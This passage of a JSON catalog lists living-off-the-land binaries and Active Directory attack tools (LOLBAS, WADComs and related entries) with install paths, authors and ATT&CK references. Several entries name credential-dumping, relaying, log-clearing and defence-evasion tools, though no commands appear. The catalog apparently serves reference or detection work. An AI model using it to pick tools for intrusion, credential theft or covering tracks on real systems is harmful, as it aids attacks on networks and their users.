Kits\\10\\bin\\<version>\\UIAVerify\\VisualUiaVerifyNative.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Lee Christensen @tifkin","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/"],"count":1},{"id":"lolbas:vslaunchbrowser-exe","name":"VSLaunchBrowser.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"author":"Avihay Eldad","created":"2024-04-12T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"],"count":3},{"id":"lolbas:vshadow-exe","name":"Vshadow.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\vshadow.exe"],"author":"Ayberk Halaç","created":"2023-09-06T00:00:00.000Z","contributors":["Ayberk Halaç"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/"],"count":1},{"id":"lolbas:vsjitdebugger-exe","name":"vsjitdebugger.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\windows\\system32\\vsjitdebugger.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsjitdebugger/"],"count":1},{"id":"lolbas:wfmformat-exe","name":"WFMFormat.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\there\\is\\no\\default\\installation\\path\\WFMFormat.exe"],"author":"Tim Baker","created":"2024-12-05T00:00:00.000Z","contributors":["Tim Baker (https://www.dotsec.com)"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WFMFormat/"],"count":1},{"id":"lolbas:wfc-exe","name":"Wfc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\wfc.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/"],"count":1},{"id":"lolbas:windbg-exe","name":"WinDbg.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\windbg.exe"],"author":"Avihay Eldad","created":"2025-07-16T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinDbg/"],"count":1},{"id":"lolbas:winproj-exe","name":"WinProj.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\WinProj.exe"],"author":"Avihay Eldad","created":"2024-02-14T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinProj/"],"count":1},{"id":"lolbas:winword-exe","name":"Winword.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe"],"author":"Reegun J (OCBC Bank)","created":"2019-07-19T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/"],"count":1},{"id":"lolbas:wsb-exe","name":"wsb.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"author":"Konrad 'unrooted' Klawikowski","created":"2026-05-28T00:00:00.000Z","contributors":["Konrad 'unrooted' Klawikowski","Lloyd Davies @LloydLabs"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"],"count":3},{"id":"lolbas:wsl-exe","name":"Wsl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\wsl.exe"],"author":"Matthew Brown","created":"2019-06-27T00:00:00.000Z","contributors":["Alex Ionescu @aionescu","Matt @NotoriousRebel1","Asif Matadar @d1r4c","Nasreddine Bencherchali @nas_bench","Konrad 'unrooted' Klawikowski","Liran Ravich, CardinalOps"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"],"count":5},{"id":"lolbas:xbootmgr-exe","name":"XBootMgr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe"],"author":"Avihay Eldad","created":"2025-07-10T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad","Tommy Warren"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgr/"],"count":2},{"id":"lolbas:xbootmgrsleep-exe","name":"XBootMgrSleep.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe"],"author":"Avihay Eldad","created":"2024-06-13T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad","Yuval Saban @yuvalsaban3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgrSleep/"],"count":1},{"id":"lolbas:devtunnel-exe","name":"devtunnel.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Temp\\.net\\devtunnel\\devtunnel.exe","C:\\Users\\<username>\\AppData\\Local\\Temp\\DevTunnels\\devtunnel.exe"],"author":"Kamran Saifullah","created":"2023-09-16T00:00:00.000Z","contributors":["Kamran Saifullah @deFr0ggy"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnel/"],"count":1},{"id":"lolbas:dotnet-counters-exe","name":"dotnet-counters.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-counters.exe"],"author":"Iván Cabrera","created":"2026-08-27T00:00:00.000Z","contributors":["Iván Cabrera @ivancabrera02"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-counters/"],"count":1},{"id":"lolbas:dotnet-trace-exe","name":"dotnet-trace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-trace.exe"],"author":"Iván Cabrera","created":"2026-08-27T00:00:00.000Z","contributors":["Iván Cabrera @ivancabrera02"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-trace/"],"count":1},{"id":"lolbas:vsls-agent-exe","name":"vsls-agent.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\Extensions\\Microsoft\\LiveShare\\Agent\\vsls-agent.exe"],"author":"Jimmy (@bohops)","created":"2022-11-01T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsls-agent/"],"count":1},{"id":"lolbas:vstest-console-exe","name":"vstest.console.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\TestAgent\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe"],"author":"Onat Uzunyayla","created":"2023-09-08T00:00:00.000Z","contributors":["Onat Uzunyayla","Ayberk Halac"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/vstest.console/"],"count":1},{"id":"lolbas:winfile-exe","name":"winfile.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\winfile.exe","C:\\Windows\\winfile.exe","C:\\Program Files\\WinFile\\winfile.exe","C:\\Program Files (x86)\\WinFile\\winfile.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\\WinFile\\winfile.exe"],"author":"Avihay Eldad","created":"2024-04-30T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/winfile/"],"count":1},{"id":"lolbas:xsd-exe","name":"xsd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\bin\\NETFX <version> Tools\\xsd.exe"],"author":"Avihay Eldad","created":"2024-04-09T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/xsd/"],"count":1},{"id":"daemon:kubectl","name":"kubectl","source":"DAEMON","platform":["Linux","Windows"],"references":["https://attack.mitre.org/techniques/T1609/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_exec/"],"count":9},{"id":"daemon:crictl","name":"crictl","source":"DAEMON","platform":["Linux"],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/","https://attack.mitre.org/techniques/T1609/"],"count":2},{"id":"daemon:ctr","name":"ctr","source":"DAEMON","platform":["Linux"],"references":["https://hacktricks.wiki/en/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.html","https://attack.mitre.org/techniques/T1611/"],"count":1},{"id":"daemon:runc","name":"runc","source":"DAEMON","platform":["Linux"],"references":["https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation","https://attack.mitre.org/techniques/T1611/"],"count":1},{"id":"daemon:docker","name":"docker","source":"DAEMON","platform":["Linux"],"references":["https://docs.docker.com/reference/cli/docker/container/export/","https://docs.docker.com/reference/cli/docker/image/save/","https://attack.mitre.org/techniques/T1005/"],"count":1},{"id":"daemon:nerdctl","name":"nerdctl","source":"DAEMON","platform":["Linux"],"references":["https://github.com/containerd/nerdctl/blob/main/docs/command-reference.md","https://attack.mitre.org/techniques/T1611/"],"count":1},{"id":"daemon:msiexec","name":"msiexec.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msiexec.yml","https://attack.mitre.org/techniques/T1218/007/"],"count":1},{"id":"daemon:curl","name":"curl.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://curl.se/docs/manpage.html","https://curl.se/windows/"],"count":1},{"id":"daemon:tar","name":"tar.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Tar.yml","https://learn.microsoft.com/en-us/windows/tar/"],"count":1},{"id":"daemon:ssh","name":"ssh.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ssh.yml","https://attack.mitre.org/techniques/T1202/"],"count":1},{"id":"daemon:scp","name":"scp.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Scp.yml","https://attack.mitre.org/techniques/T1202/"],"count":1},{"id":"daemon:msedge","name":"msedge.exe","source":"DAEMON","platform":["Windows","macOS","Linux"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msedge.yml","https://twitter.com/mrd0x/status/1478234484881436672"],"count":1},{"id":"daemon:mpcmdrun","name":"MpCmdRun.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/MpCmdRun.yml","https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/"],"count":1},{"id":"daemon:desktopimgdownldr","name":"desktopimgdownldr.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Desktopimgdownldr.yml","https://www.sentinelone.com/labs/living-off-windows-land-a-new-native-file-downldr/"],"count":1},{"id":"daemon:appinstaller","name":"AppInstaller.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/AppInstaller.yml","https://attack.mitre.org/techniques/T1105/"],"count":1},{"id":"daemon:onedrivestandaloneupdater","name":"OneDriveStandaloneUpdater.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/OneDriveStandaloneUpdater.yml","https://attack.mitre.org/techniques/T1105/"],"count":1},{"id":"daemon:finger","name":"finger.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Finger.yml","https://attack.mitre.org/techniques/T1105/"],"count":1},{"id":"daemon:wsl","name":"wsl.exe","source":"DAEMON","platform":["Windows","Linux"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Wsl.yml","https://attack.mitre.org/techniques/T1202/"],"count":1},{"id":"daemon:winget","name":"winget.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Winget.yml","https://learn.microsoft.com/en-us/windows/package-manager/winget/install"],"count":1},{"id":"daemon:devtunnel","name":"devtunnel.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/cli-commands"],"count":1},{"id":"daemon:teams","name":"Teams.exe","source":"DAEMON","platform":["Windows","macOS","Linux"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Teams.yml","https://attack.mitre.org/techniques/T1218/015/"],"count":1},{"id":"daemon:diskshadow","name":"diskshadow.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Diskshadow.yml","https://attack.mitre.org/techniques/T1003/003/"],"count":1},{"id":"daemon:wevtutil","name":"wevtutil.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"],"count":2},{"id":"daemon:powershell","name":"Clear-EventLog","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/clear-eventlog"],"count":6},{"id":"daemon:auditpol","name":"auditpol.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1562/002/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"],"count":1},{"id":"daemon:fsutil","name":"fsutil.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1070/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn"],"count":1},{"id":"daemon:attrib","name":"attrib.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1564/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/attrib"],"count":1},{"id":"daemon:reg","name":"reg.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware"],"count":1},{"id":"daemon:netsh","name":"netsh.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1562/004/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/netsh-advfirewall"],"count":1},{"id":"daemon:byovd","name":"BYOVD (vulnerable driver)","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1068/","https://www.loldrivers.io/"],"count":1},{"id":"wadcoms:ADCSEnumaration","name":"ADCSEnumaration","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/"],"count":1},{"id":"wadcoms:BloodHound.py","name":"BloodHound.py","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/BloodHoundAD/BloodHound","https://github.com/fox-it/BloodHound.py"],"count":2},{"id":"wadcoms:CredDumpWithoutMimilkatz","name":"CredDumpWithoutMimilkatz","source":"WADComs","platform":["Windows","Linux"],"references":["https://www.ired.team/offensive-security/credential-access-and-credential-dumping","https://www.synacktiv.com/en/publications/lsa-secrets-revisiting-secretsdump"],"count":1},{"id":"wadcoms:Dementor","name":"Dementor","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"],"count":1},{"id":"wadcoms:Enum4Linux","name":"Enum4Linux","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/CiscoCXSecurity/enum4linux","https://github.com/cddmp/enum4linux-ng"],"count":3},{"id":"wadcoms:Evil","name":"Evil","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/Hackplayers/evil-winrm","https://book.hacktricks.xyz/cryptography/certificates"],"count":3},{"id":"wadcoms:FindUncommonShares","name":"FindUncommonShares","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/p0dalirius/FindUncommonShares"],"count":1},{"id":"wadcoms:Impacket-dcomexec","name":"Impacket-dcomexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/"],"count":1},{"id":"wadcoms:Impacket-Get-GPPPassword","name":"Impacket-Get-GPPPassword","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py","https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/"],"count":1},{"id":"wadcoms:Impacket-GetADUsers","name":"Impacket-GetADUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetADUsers.py"],"count":1},{"id":"wadcoms:Impacket-GetNPUsers","name":"Impacket-GetNPUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"],"count":1},{"id":"wadcoms:Impacket-GetUserSPNs","name":"Impacket-GetUserSPNs","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/","https://github.com/fortra/impacket","https://swarm.ptsecurity.com/kerberoasting-without-spns/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"count":2},{"id":"wadcoms:Impacket-ticketer","name":"Impacket-ticketer","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/","https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/"],"count":3},{"id":"wadcoms:Impacket-lookupsid","name":"Impacket-lookupsid","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py","https://www.puckiestyle.nl/impacket/"],"count":1},{"id":"wadcoms:Impacket-ntlmrelayx","name":"Impacket-ntlmrelayx","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/","https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://www.thehacker.recipes/ad/movement/credentials/dumping/laps","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/relay","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"count":10},{"id":"wadcoms:Impacket-psexec","name":"Impacket-psexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py","https://www.sans.org/blog/psexec-python-rocks/","https://book.hacktricks.xyz/windows/active-directory-methodology/pass-the-ticket#pass-the-ticket-attack"],"count":2},{"id":"wadcoms:Impacket-rbcd","name":"Impacket-rbcd","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rbcd.py","https://github.com/tothi/rbcd-attack"],"count":1},{"id":"wadcoms:Impacket-rpcdump","name":"Impacket-rpcdump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-reg","name":"Impacket-reg","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/reg.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-samrdump","name":"Impacket-samrdump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-smbclient","name":"Impacket-smbclient","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbclient.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-smbexec","name":"Impacket-smbexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py","https://www.varonis.com/blog/insider-danger-stealthy-password-hacking-with-smbexec/"],"count":1},{"id":"wadcoms:Impacket-secretsdump","name":"Impacket-secretsdump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy"],"count":2},{"id":"wadcoms:Impacket-services","name":"Impacket-services","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/services.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-wmiexec","name":"Impacket-wmiexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#wmiexecpy"],"count":1},{"id":"wadcoms:Impacket-addcomputer","name":"Impacket-addcomputer","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"],"count":2},{"id":"wadcoms:Impacket-atexec","name":"Impacket-atexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py","https://u0041.co/blog/post/1"],"count":2},{"id":"wadcoms:Impacket-getST","name":"Impacket-getST","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"],"count":2},{"id":"wadcoms:Impacket-getTGT","name":"Impacket-getTGT","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getTGT.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"],"count":1},{"id":"wadcoms:Kerbrute","name":"Kerbrute","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ropnop/kerbrute"],"count":4},{"id":"wadcoms:LDAPSearch","name":"LDAPSearch","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://linux.die.net/man/1/ldapsearch"],"count":2},{"id":"wadcoms:Mitm6","name":"Mitm6","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/dirkjanm/mitm6","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"count":1},{"id":"wadcoms:NetExec","name":"NetExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://blog.redteam-pentesting.de/2025/windows-coercion/","https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/scan-for-vulnerabilities","https://www.netexec.wiki/","https://attack.mitre.org/techniques/T1558/004/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast","https://attack.mitre.org/techniques/T1558/003/","https://cybersecurity.bureauveritas.com/blog/timeroasting-attacking-trust-accounts-in-active-directory","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.netexec.wiki/ldap-protocol/enumerate-machineaccountquota","https://attack.mitre.org/techniques/T1087/002/","https://www.netexec.wiki/mssql-protocol/command-execution","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.netexec.wiki/mssql-protocol/authentication","https://www.netexec.wiki/mssql-protocol/mssql-privesc","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password","https://attack.mitre.org/techniques/T1552/006/","https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-k